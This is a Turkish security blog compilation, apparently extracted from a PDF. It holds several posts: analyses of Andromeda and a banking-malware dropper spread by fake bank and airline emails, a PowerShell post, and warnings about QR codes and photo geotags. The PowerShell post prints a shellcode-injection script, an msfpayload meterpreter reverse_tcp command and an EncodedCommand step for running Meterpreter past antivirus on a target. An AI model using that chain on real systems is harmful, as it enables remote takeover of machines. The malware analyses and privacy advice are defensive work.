Pwndromeda. Andromeda zararlı yazılımını yazılım seviyesinde analiz ettiğimde dikkatimi çeken lol adında bir mutex nesne kontrolü oldu.

Transkript

1 Pwndromeda Son yazımdan yani 1 Ocak 2013 tarihinden bu yana geçen zaman zarfında Zemana dan Emre TINAZTEPE nin yayınlamış olduğu analiz raporunda sahte epostalar ile gönderilen bankacılık zararlı yazılımının Andromeda (Symantec e göre Downloader.Dromedan) zararlı yazılımı olduğunu ve dropper (başka bir zararlı yazılım indiren ve çalıştıran zararlı yazılım) olarak çalışarak Cridex ve/veya Zeus bankacılık zararlı yazılımlarını indirdiğini görmüş olduk. Bir önceki yazımda da Andromeda zararlı yazılımının sanal makinede çalıştırılması durumunda farklı davranışlar sergilediğini ve sadece sistemsel analizler yapılarak hatalı sonuçlara varılabileceğini görmüş olduk. 1 Ocak tarihinden bu yana sahte Turkcell, Kuveyt Türk, Türk Telekom, Garanti Bankası e-postaları ile sayısız defa tekrar ve tekrar gönderilen Andromeda zararlı yazılımı, her defasında olmasa da her iki gönderimde bir, yeni bir komuta kontrol merkez adresi ile gönderiliyordu. Durum böyle olunca da analiz için yazılım seviyesine inemeyen ancak zararlı yazılıma karşı da kurumlarını ve çalışanlarını korumak için komuta kontrol merkezi adreslerini tespit etmek ve güvenlik cihazları üzerinde kara listeye eklemek isteyen çok sayıda sistem/güvenlik yöneticisi olduğunu farkettim ve kendilerine yardımcı olabilmek adına işe koyuldum. Normalde bu zararlı yazılım sanal makinede çalıştığını kontrol etmiyor ve farklı davranışlar sergilemiyor olsaydı bu zararlı yazılımı sanal makineye kopyalayıp, çalıştırarak ve Wireshark gibi bir trafik izleme aracı ile izleyerek haberleştiği komuta merkezlerini rahatlıkla tespit edebilirdiniz ancak aksi bir durum söz konusu olduğu için her defasında bu zararlı yazılımı, yazılım seviyesine inip analiz etmekten veya zararlı yazılım tarafından tespit edilemeyen özel olarak konfigüre edilmiş bir sanal makinede çalıştırmaktan başka bir çareniz kalmıyordu. Özel olarak konfigüre edilmiş bir sanal makine, tespit edilmemek için ana sistem ile arasındaki kullanımı kolaylaştıran dosya paylaşımı gibi özelliklerden arındırıldığı için sanal makineyi tam randımanlı kullanmak pek mümkün olmuyor. Bu durumda eliniz kolunuz bağlı beklemekten veya zorluklarla mücadele ederek ilerlemekten başka çareniz kalmıyor. Peki gerçekten de öyle mi? Aslında analiz etmek istediğiniz zararlı yazılım Andromeda olduğu sürece az önce bahsettiğim zorluklarla mücadele etmek zorunda değilsiniz. Andromeda zararlı yazılımını yazılım seviyesinde analiz ettiğimde dikkatimi çeken lol adında bir mutex nesne kontrolü oldu.

2 Mutex nesnesini kabaca ve kısaca, bir yazılımın, kopyasının, sistemde çalışmasını engellemek amacıyla kullanılan bir nesne olarak düşünebilirsiniz. Örneğin X yazılımı sistemde çalıştığında Hack4Career mutex nesnesi yaratabilir ve ardından sistemde ikinci defa çalıştırıldığında hali hazırda sistemde çalışıp çalışmadığını kontrol etmek için Hack4Career mutex nesnesini kontrol ederek bu sonuca göre sistemde tekrar çalışıp çalışmayacağına karar verebilir. Bu kontrol sayesinde eğer lol adındaki bu mutex nesnesi sistemde yaratılmış ise Andromeda zararlı yazılımı, tüm VM kontrollerini atlayarak, pas geçerek sanal makine içinde çalışmaktaydı. Kısacası Andromeda zararlı yazılımının geliştiricisi muhtemelen sanal makinede zararlı yazılımı test edilebilmek için zararlı yazılımına bir nevi arka kapı koymuştu. Bu sayede biz de bu arka kapıdan faydalanarak Andromeda zararlı yazılımının sanal makinede çalışmasını sağlayabilir ve rahatlıkla trafiğini analiz edebilirdik. Bunun için Python ile Andromeda Anti VM adında işletim sisteminde lol adında bir mutex nesnesi oluşturan ufak bir program hazırladım. Bu sayede Andromeda zararlı yazılımını analiz etmek için yapmanız gereken tek şey Andromeda zararlı yazılımı ile birlikte Andromeda Anti VM programını sanal makineye kopyalamak, önce Andromeda Anti VM programını daha sonra ise Andromeda zararlı yazılımını çalıştırmak ve sanal makinenin ürettiği trafiği izleyerek kara listeye ekleyeceğiniz adresleri rahatlıkla tespit etmektedir. Hatta benim gibi işi gereği komuta kontrol merkezlerini anlık olarak takip etmek isteyenler aşağıdaki resimde ve videoda yer aldığı gibi Andromeda Anti

3 VM programını izleme mekanizmalarının kilit bir parçası olarak da kullanabilirler. Analizinizi kolaylaştıracak Andromeda Anti VM programını buradan indirebilirsiniz. Bir sonraki yazıda görüşmek dileğiyle herkese güvenli günler dilerim. Aşağıdaki video, 30 Ocak tarihinde gönderilen sahte Garanti Bankası e-postası ile gönderilen Andromeda zararlı yazılımı üzerinde yapılan çalışmayı içermektedir. (Andromeda zararlı yazılımlarının temin edilmesinde göstermiş olduğu yardımseverlik nedeniyle Kemal Karakaya ya teşekkürü bir borç bilirim.) Şeytan Ayrıntıda Gizlidir 19 Aralık 2012 tarihinde birçok banka müşterilerinden gelen ihbarları değerlendirmek ile güne başladı. Aynı anda sosyal medyada ve NetSec bilişim güvenliği e-posta listesinde Turkcell ve Vodafone dan gönderildiği ve ekinde zararlı yazılım bulunduğu öne sürülen e-postalar yer almaya başladı.

4 24 Aralık 2012 tarihinde ise bu defa THY den gönderildiği ve ekinde zararlı yazılım bulunduğu öne sürülen e-postalar gündemi meşgul etmeye başladı. E-postaların başlık bilgileri incelendiğinde e-postaların Turkcell ve THY den gönderiliyormuş gibi gösterilmeye çalışıldığı anlaşılıyordu. Fakat dikkatlice bakıldığında son adımda e-postanın Tayvan da ki bir sunucudan alınmış olduğu bu nedenle başlık bilgilerinin manipüle edildiği açıkça anlaşılıyordu.

5 Ardından bazı web sitelerinde ve NetSec bilişim güvenliği e-posta listesinde zararlı yazılım üzerinde yapılan kısa analizlere yer verildi ve bu analizlerde zararlı yazılımın trojan olmadığı, çalıştırıldıktan sonra 8000 numaralı bağlantı noktasında (port) dinlemeye geçtiği ve bu bağlantı noktasından sisteme bağlanan kişilere komut satırı erişimi (shell) verildiği belirtiliyordu. Emek ve zaman harcandığı açıkça belli olan profesyönelce hazırlanmış iki farklı sahte e-posta ve sadece çalıştırıldığı sistemde 8000 numaralı bağlantı

6 noktasında komut satırı erişimi veren zararlı bir yazılım? Muhtemelen okurken size de inandırıcı gelmeyen bu senaryo bana da hiç inandırıcı gelmediği için sahte THY e-postasında yer alan zararlı yazılıma kısaca göz atmaya karar verdim. Özellikle yazılım seviyesine inilmeden sistem seviyesinde yapılan analizler, zararlı yazılımın sanal makine, debugger, sandbox tespitine yönelik kontroller içermesi durumunda farklı sonuçlar ortaya çıkarabilmektedir bu nedenle yazılım seviyesine inilmeden yapılan bir analiz sonucuna göre bir karara varmak çok doğru değildir. Yazılım seviyesine inilse dahi kimi zaman yanılma payı olabilmektedir. Immunity Debugger aracı ile zararlı yazılımı analiz etmeye başladığımda ilk dikkatimi çeken Immunity Debugger tarafından karşıma çıkan şüpheli uyarı mesajları oldu. Ardından bir Anti Debugging tekniği olan ve zararlı yazılımlarda sıkça karşılaşılan SetUnhandledExceptionFilter dikkatimi çekti. Normalde bir yazılım çalışma esnasında ortaya çıkabilecek potansiyel hataları, istisnai durumları tespit eder ve ona göre aksiyon alır ancak öngörülemeyen hatalar için bir yazılımcı SetUnhandledExceptionFilter filtresi ile öngörülemeyen hataların da tespit edilmesini ve buna göre aksiyon almasını sağlayabilir. Hata ayıklayıcı (debugger) ile çalıştırılan bir yazılımda ise debugger yazılımın çalışması esnasında ortaya çıkan hataları, istisnai durumları kendisi yönetmeye çalışır. Bunu bilen zararlı yazılım geliştiricileri de bu filtreden faydalanarak sayısal hatalara yol açacak bir kod parçası çalıştırır ve bu hatayı bu filtrenin ayıklamasını ve yazılımın akışına devam etmesini sağlar. Ancak bunu bilmeyen bir hata ayıklayıcı böyle bir hata ile karşılaştığında yazılımın akışını devam ettiremez ve yazılım çökmüş olur kısaca SetUnhandledExceptionFilter ile debuggerlar bu şekilde devre dışı bırakılmaya çalışılır.

7 Bu adımları geçtikten ve zararlı yazılımın paketlenmiş (packed) bölümlerini açtığını farkettim.

8

9

10

11

12 Son adımlara yaklaşırken zararlı yazılımın işletim sistemi üzerinde çalışan potansiyel güvenlik yazılımlarını atlatmak için runpe (hafızadan işlem (process) çalıştırma) yöntemini kullanmak için hazırlık yaptığı anlaşılıyordu.

13 Biraz daha ilerledikten sonra zararlı yazılımın paketinden çıkarmış olduğu işlemi (process) kontrol ettiğini farkettim ve diske kayıt edip, HEX editor ile fazlalık kısımları temizleyip Immunity Debugger ile çalıştırdım ve incelemeye başladım.

14

15 İlk dikkatimi çeken C6 fonksiyonu ile işlemlerin (processes) teker teker hashini alıp ardından ön tanımlı işlemlerin hashleri ile kıyasladığını farkettim. Belli ki yazılımı geliştirenler bazı yazılımları kara listeye

16 almışlardı. Zararlı yazılımı VMWare içinde çalıştırdığım için vmwareuser.exe yazılımının kara listede olduğu hemen anlaşılıyordu. Ancak biraz çatlak olduğum için hangi yazılımların kara listede yer aldığını öğrenmek için Python ile adresinde kayıtlı olan tüm işlemlerin (processes) listesini oluşturan ufak bir araç hazırladım ve hash fonksiyonunu bire bir Python kodu ile oluşturarak tüm işlemleri bu araçtan geçirerek kara listede yer alan tüm yazılımları (netmon.exe, procmon.exe, sandboxiedcomlaunch.exe, sandboxierpcss.exe, vboxservice.exe, vboxtray.exe, vmwareservice.exe, vmwareuser.exe, wireshark.exe) tespit ettim. Bunun dışında zararlı yazılımın sbiedll.dll ile Sandboxie yazılımın sistemde yüklü olup olmadığını, vmware, vbox gibi sanal makinede çalışıp çalışmadığının kontrolü, qemu öykünücü (emulator) kontrolü ve RDTSC yönergesi (instruction) ile yönergeler arası geçen sürenin kontrolü ile kum havuzu ve

17 hata ayıklıcı kontrolü yaptığını tespit ettim. Zararlı yazılım bu kontrollerden herhangi birine takıldığı taktirde kendisini %ALLUSERSPROFILE% ortam değişkeninde (environment) yer alan klasöre kopyalamakta ve sistem yeniden başlatıldığında çalışabilmek için kayıt defterinde HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SunJavaUpdateSched anahtarı oluşturmaktadır. Çalıştığı zaman da hem e-posta hem de web sitelerine konu olduğu gibi numaralı bağlantı noktasında (port) dinlemeye geçmekte ve bu bağlantı noktasından sisteme bağlanan kişilere komut satırı erişimi (shell) vermektedir.

18

19

20 Ancak bu zararlı yazılım, kontrollerden herhangi birine takılmaz ise 32 bit işletim sisteminde windows\system32 klasörü altında wuauclt.exe dosyası yaratmakta, 64 bit işletim sisteminde ise windows\syswow64 klasörü altında svchost.exe dosyası yaratmakta (windows file protection izin verirse), çalıştırmakta ardından kendisini bu işleme (process) enjekte ederek diğer faza geçmektedir. Son fazda ise sisteme bankacılık zararlı yazılımı bulaştırarak Zeus ve Spyeye dan bildiğimiz gibi kullanıcının cep telefonuna da zararlı yazılım göndererek internet şubesini kullanan kullanıcının kullanıcı adını, şifresini ve sms doğrulama kodunu çalarak müşterilerin hesabını boşaltmaya çalışmaktadır.

21 Sonuç olarak yazının başında da bahsettiğim üzere yazılım seviyesine inilmeden sistem seviyesinde yapılan analizler, zararlı yazılımın sanal makine, debugger, sandbox tespitine yönelik kontroller içermesi durumunda farklı sonuçlar ortaya çıkarabilmektedir bu nedenle zararlı yazılım hakkında kesin bir sonuca varmak için mutlaka ama mutlaka yazılım seviyesinde de analiz yapılması gerekmektedir. Türkiye deki banka müşterilerini hedef alan bu zararlı yazılım ile ilgili daha fazla bilgi almak için Tübitak BİLGEM tarafından yayınlanan analiz yazısını da okumanızı öneririm. Bu vesileyle herkesin yeni yılını kutlar, 2013 yılının herkese önce sağlık sonra güvenli günler getirmesini dilerim. Not: Her ne kadar bu zararlı yazılım Tübitak BİLGEM in yayınlamış olduğu analiz yazısında Zeus un bir türevi olarak yer almış olsa da Zemana firmasından Emre TINAZTEPE nin yapmış olduğu bir açıklamaya göreye zararlı yazılım kimi zaman Zeus kimi zaman ise Cridex olarak son kullanıcının sistemine yüklenmektedir. Daha detaylı yeni analiz raporları/yazıları

22 yayınlandıkça bu zararlı yazılım hakkında daha net bilgilere sahip olacağımıza inanıyorum. Komut Satırının Gücü Adına! Yapılan istatistiklere göre 2011 yılının son çeyreğinde Windows XP işletim sistemi ile Windows 7 işletim sistemi arasındaki kullanım oranları birbirine oldukça yakınken, 2012 yılının son çeyreğinde Windows 7 işletim sistemi kullanım oranının Windows XP işletim sistemi kullanım oranını ikiye katlamış olması, penetrasyon testi/sızma testi gerçekleştiren bilişim güvenliği uzmanları arasında tek bir nedenden ötürü memnuniyetle karşılandı o da Windows 7 ile yüklü gelen Powershell den başkası değildi. Powershell, Mircosoft tarafından yönetim görevlerini otomatize etmek amacıyla geliştirilmiş,.net sınıflarından faydalanarak betikler (script) geliştirilmesine imkan tanıyan yeni nesil komut satırıdır. İlk sürümü 2006 yılında Microsoft tarafından yayınlanan Powershell in ikinci sürümü 2009 yılında Windows 7 ve Windows 2008 işletim sistemlerine entegre edilmiş üçüncü sürümü ise Windows 8 ve Windows Server 2012 işletim sistemlerine entegre edilerek kullanıcıların kullanımına sunulmuştur. Powershell, güvenlik önlemi adına güvenilir kaynaklar tarafından geliştirilmemiş olan betiklerin çalıştırılmasına varsayılan (default) olarak izin vermez. Kurumsal ortamlarda da daha önce Powershell in gücüne tanıklık etmiş olan Sistem Yöneticileri çoğunlukla Etki Alanı Denetleyicisi (DC) üzerinden Powershell in güvenilir olmayan kaynaklardan indirilen betiklerin çalıştırılmasını yasaklamaktadırlar.

23 Ancak ve ancak sistem yöneticileri de dahil çoğu son kullanıcı bu betiklerin Command ve EncodedCommand (Base64 ile kodlanmış (encode) betik) ile de çalıştırıldığından haberdar değildir. Normal şartlarda betik çalıştırmaya izin vermeyen politikalar Command ve EncodedCommand ile atlatılabilmektedir. Powershell in betiklerde.net sınıflarını kullanmaya imkan tanıması, C# ile yazılmış bir kod parçasını çalıştırma (runtime) esnasında derlemesi ve çalıştırması sayesinde örneğin komut enjeksiyonu (command injection) zafiyeti olan bir Windows Server 2008 işletim sisteminin komut satırına uzaktan erişmek (remote shell) veya basit şifre tahmini ile sızılan bir Windows 7 işletim sisteminin Metasploit e bağlanmasını sağlamak mümkündür. En önemlisi ise Powershell sayesinde Antivirüs yazılımının kullanıldığı bir sistemde

24 Antivirüs e yakalanmadan istenilen kabuk kodu çalıştırabilmektedir. Örnek olarak Powershell üzerinden kabuk kodu çalıştırmak için Matt Graeber tarafından geliştirilen aşağıdaki betiği kullanabilirsiniz. $code = {$code = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpaddress, uint dwsize, uint flallocationtype, uint flprotect);[dllimport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpthreadattributes, uint dwstacksize, IntPtr lpstartaddress, IntPtr lpparameter, uint dwcreationflags, IntPtr lpthreadid);[dllimport("msvcrt.dll")]public static extern IntPtr memset(intptr dest, uint src, uint count);';$winfunc = Add-Type memberdefinition $code -Name "Win32" -namespace Win32Functions passthru;[byte[]];[byte[]]$sc64 = ;[Byte[]]$sc = $sc64;$size = 0x1000;if ($sc.length -gt 0x1000) {$size = $sc.length};$x=$winfunc::virtualalloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.length-1);$i++) {$winfunc::memset([intptr]($x.toint32()+$i), $sc[$i], 1)};$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };} Betiğin çalışabilmesi için $sc64 değişkenine hedef işlemci mimarisine uygun olan (x32 veya x64) kabuk kodunu kopyalamanız gerekmektedir. $sc64 değişkenine atanacak kabuk kodunu aşağıdaki şekilde oluşturabilirsiniz. msfpayload windows/x64/meterpreter/reverse_tcp LHOST= PORT=4444 EXITFUNC=thread C sed '1,6d;s/[";]//g;s/\\/,0/g' tr -d '\n' cut -c2- sed 's/^[^0]*\(0.*\/\*\).*/\1/' sed 's/.\{2\}$//' tr -d '\n' more Ardından betik bloğunu Powershell komut satırına kopyaladıktan sonra Base64 ile kodlamak için [convert]::tobase64string([text.encoding]::unicode.getbytes($code)) kodunu çalıştırmanız gerekmektedir. Son olarak Backtrack de hazır bulunan Meterpreter ile hedef sistemi bağlamak için az önce elde ettiğiniz BASE64 ile kodlanmış betiği hedef sistemde powershell -EncodedCommand şeklinde çalıştırarak Meterpreter ın Antivirüs yüklü hedef sistemde başarıyla

25 çalışmasını sağlayabilirsiniz. Sonuç olarak Powershell üstün özelliklerinin yanı sıra mevcut güvenlik kontrollerinin yetersiz olması nedeniyle kötüye kullanıma açık olduğu için kullanımına ihtiyaç duyulmayan sistemlerden kaldırılmasını tavsiye ederim. Bir sonraki yazıda görüşmek dileğiyle herkese güvenli günler dilerim. Çabuk Tepki Vermeyin Quick Response Code (QR Code) Türkçe meali ile Çabuk Tepki Kodu, 1994 yılında Toyota nın iştiraki olan Japon Denso firması tarafından üretim bandında parça takibi amacıyla geliştirilmiş iki boyutlu barkod türüdür. QR Kodunun veri kapasitesi, nümerik olarak en fazla karakter, alfanümerik olarak en fazla karakter, ikilik sistem (8 Bit) olarak en fazla bayt, Kanji/Kana olarak ise en fazla karakterdir. (Veri kapasitesi seçilen sürüme ve hata düzeltimine göre değişiklik gösterebilir.) Günümüzde hemen hemen her akıllı cihazda (cep telefonları, tabletler vb.) barkod okuyucu uygulaması olması nedeniyle barkodlar, başta reklam sektörü olmak üzere hizmet sektörü, gıda sektörü, yazılım sektörü ve bankacılık sektörü gibi birçok sektör tarafından çeşitli amaçlar (web sitesi reklamı, uygulama indirme, sanal alışveriş vs.) için kullanılmaktadır. Örneğin bundan 7 ay önce Astoria Alışveriş Merkezinde karşılaştığım devasa QR koduna bakacak olursanız Mekanist mobil uygulamasını yükletmek amacıyla

26 kullanıldığını görebilirsiniz.

27 Bir diğer örnek olarak ise farklı hizmetler sunmak ve dünyada bir ilk olmak için birbirleriyle yarışan risk iştahları yüksek bankalarımızın çeşitli yöntemler ile (salla yolla, sosyal ağdan bankacılık) gerçekleştirdikleri bankacılık işlemlerini benimsemeye çalışırken diğer bir bankamızın ATM den QR kod ile kredi kartsız para çekmeye imkan tanıyarak dünyada bir ilke imza attığını görebilirsiniz.

28 Günümüzde QR kodların hemen hemen her alanda sıkça kullanılıyor olması ve cep

29 telefonumuz ile her gördüğümüz barkodu taramaya başlıyor olmamız aslında sosyal mühendislik saldırılarına da davetiye çıkarmaktadır. Çoğu zaman akıllı cep telefonlarında da birer işletim sistemi çalıştığını ve bu işletim sistemlerinin de aynı Windows ve Linux işletim sistemleri gibi zafiyetlere sahip olduğunu ancak bu işletim sistemlerinden farklı olarak güvenlik yamalarının kolayca yüklenemediğini göz ardı etmekteyiz. Durum böyle olunca da cep telefonlarımızın QR kodlar da dahil olmak üzere çeşitli yollar ile istismar edilme olasılığı artmaktadır. Örneğin ios ve Android işletim sistemlerinde bulunan Webkit internet tarayıcısı motorunda keşfedilen zafiyetlerin sadece bir web sitesini ziyaret ederek istismar edilebildiği haberlerini daha önce okumuştuk. Mekanist örneğinde olduğu gibi barkod okuyucu uygulaması ile QR kod taratan ve uygulama indirip kurmaya alışan bir kullanıcının art niyetli kişilerce hazırlanan bir QR kodu okutması ve ardından zararlı uygulamayı cep telefonuna kurma olasılığı yüksektir çünkü QR kodları hazırlayan kişilerin/firmaların doğruluğunun teyit edilmesi mümkün değildir. Veya banka örneğinde olduğu gibi ATM de QR kod taramaya alışan bir kullanıcının art niyetli kişilerce hazırlanan ve ATM lere yapıştırılan bir QR kodu okutması, art niyetli kişilerin kontrolünde olan bir web sitesini ziyaret etmesi ve bu site üzerinde bulunan zararlı uygulamayı cep telefonuna istem dışı yüklemesi mümkün olabilir. Özetle QR kod taramaya teşvik edildiğimiz bugünlerde güvenliğiniz için kaynağından emin olmadığınız QR kodları taramamanız, taramanız durumunda da özellikle kısaltılmış URL içeren adresleri ziyaret etmemeniz şiddetle tavsiye edilir aksi halde art niyetli kişilerin cep telefonunuza erişmesi ve kişisel bilgilerinize ele geçirmesi mümkün olabilir. Herhangi bir QR kodu taramadan önce QR kod oluşturulmasının basit ve anonim olarak gerçekleştirilebilen bir işlem olduğunu asla unutmayın.

30 Bir sonraki yazıda görüşmek dileğiyle herkese güvenli günler dilerim. Görevimiz Geotag GPS desteği olan son model ios veya Android işletim sistemine sahip olan mobil cihazınız ile bir yandan tatilinizin keyfini çıkarırken diğer yandan o muhteşem kumsalın, denizin resmini çekip sosyal medya, resim paylaşım siteleri veya kendi web siteniz üzerinden takipçileriniz ile saat başı paylaşırken, evinizi soymak için sizi bu ortamlar üzerinden takip eden ve evinize girmek için en uygun zamanı kollayan hırsızın tatil beldesi ile eviniz arasındaki mesafeyi hesaplayarak kara veya havayolu ile en erken evinize ne kadar sürede varabileceğinizi hesaplamasına istemeden yardımcı oluyor olabilirsiniz. Nasıl mı? Tabii ki çektiğiniz ve paylaştığınız resimlerinizde gizli olan Geotag ile. Geotagging kısaca bulunduğunuz konumun enlem, boylam gibi coğrafi konum bilgilerinin fotoğraf, video, web sitesi, sms mesajları, QR Code gibi çeşitli ortamlara eklenmesidir. Günümüzde GPS ile donatılmış dijital fotoğraf

31 makineleri ve akıllı telefonlar sayesinde işletim sisteminin veya uygulamaların özellikle çekilen fotoğraflara coğrafi konum bilgilerini eklemesi güvenliğimizi tehdit etmekte ve biz son kullanıcılar için önem verilmesi, üzerinde durulması gereken bir konu haline gelmektedir. Bu bilgiler JPEG dosya formatında çekilen fotoğraflara üst veri (metadata) olarak Exchangeable Image dosya biçiminde (EXIF) veya Extensible Metadata Platform (XMP) biçiminde eklenmektedir. Bu bilgiler, fotoğraf makinesi tarafından çekilen fotoğraflara vurulan ve gözle görülür olan zaman damgasından farklı olarak gözle görülmemektedir bu nedenle bu bilgileri görüntüleyebilmek için çeşitli araçlardan faydalanılmaktadır. Her ne kadar bu bilgiler son kullanıcıların güvenliği için risk teşkil etse de suçluların yakalanmasında önemli rol oynayabilir. ABD nin güneydoğusunda yer alan Alabama eyaletine ait kamu güvenliği daire başkanlığı web sitesini (dps.alabama.gov) 9 Şubat 2012 tarihinde hackleyen CabinCr3w hacking grubu üyesi ve Anonymous grubu destekçisi olan w0rmer rumuzlu bilgisayar korsanı, sitenin içeriğine kendi hazırladığı metni ve kız arkadaşının iphone ile çekilmiş bikinili resmini ekleyerek FBI ajanlarının kendisini yakalamasını sağlamıştır. Nasıl sağlandığından kısaca bahsedecek olursam; ios da Konum Hizmeti varsayılan (Location Services) olarak açık olarak gelmekte ve çekilen fotoğraflara Geotag bilgisi otomatik olarak eklenmektedir. EXIF verisi, Firefox eklentisi olan Exif Viewer gibi gibi çeşitli araçlarla incelenebilmektedir. Exif Viewer eklentisi sayesinde görüntülenen fotoğrafa sağ tuş yapılarak View Image EXIF Data ile iglili veri

32 görüntülenebilmektedir.

33 Bu eklenti, GPS enlem ve boylam bilgilerinin Google Haritalar üzerinden görüntülenmesine de imkan tanımaktadır.

34 Konum bilgilerinden bu evin w0rmer ın kız arkadaşına ait olduğunu tespit eden FBI ajanları, 20 Mart 2012 tarihinde bu eve baskın yaparak w0rmer rumuzlu bilgisayar korsanına tutuklamışlardır. Ancak çoğunlukla Geotag bilgisi kötü niyetli kişiler tarafından kullanıldığı için özellikle akıllı telefon kullanıcıları için bu bilgileri paylaşmamaları önerilmektedir. Bunun için yapılması gerekenler; Android kullanıcı iseniz; Kamera uygulamasını çalıştırdıktan sonra menüden Settings menüsüne girin ve Geotagging veya Location Storage özelliğini devre dışı bırakın. iphone (ios) kullanıcısı iseniz; Settings > Privacy > Location Services menüsü altından Camera yı off konumuna getirin.

35 Blackberry kullanıcısı iseniz; Kamera simgesine basın daha sonra Menü butonuna ardından Options menüsüne

36 girin ve son olarak Geotagging özelliğini Disabled yaparak devre dışı bırakın. Geotag li resimlerinizden bu bilgileri silmek için ise iphone için degeo uygulamasını, Android için ise Pixelgarde uygulamasını kullanabilirsiniz. Bir sonraki yazıda görüşmek dileğiyle herkese güvenli günler dilerim.